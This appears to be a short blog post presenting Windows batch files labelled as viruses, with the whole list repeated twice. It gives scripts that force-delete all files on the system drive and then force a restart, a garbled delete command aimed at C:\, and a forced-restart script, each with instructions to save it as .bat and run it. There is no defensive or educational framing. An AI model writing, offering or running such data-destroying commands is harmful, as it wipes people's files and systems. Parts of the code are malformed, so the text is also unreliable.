1.This Virus Deletes All The Content Of A Drive…
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code with .bat extension & Run.
2.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* y
Save The Above Code with .bat extension & Run.
3.The below Code Will Just Restart Ur PC
@echo off shutdown -r -f -t 00
Save The Above Code with .bat extension & Run.
Note: Won’t work on Vista or Win7 as you need to bypass UAC.
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code with .bat extension & Run.
2.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* y
Save The Above Code with .bat extension & Run.
3.The below Code Will Just Restart Ur PC
@echo off shutdown -r -f -t 00
Save The Above Code with .bat extension & Run.
Note: Won’t work on Vista or Win7 as you need to bypass UAC.
0 comments:
Post a Comment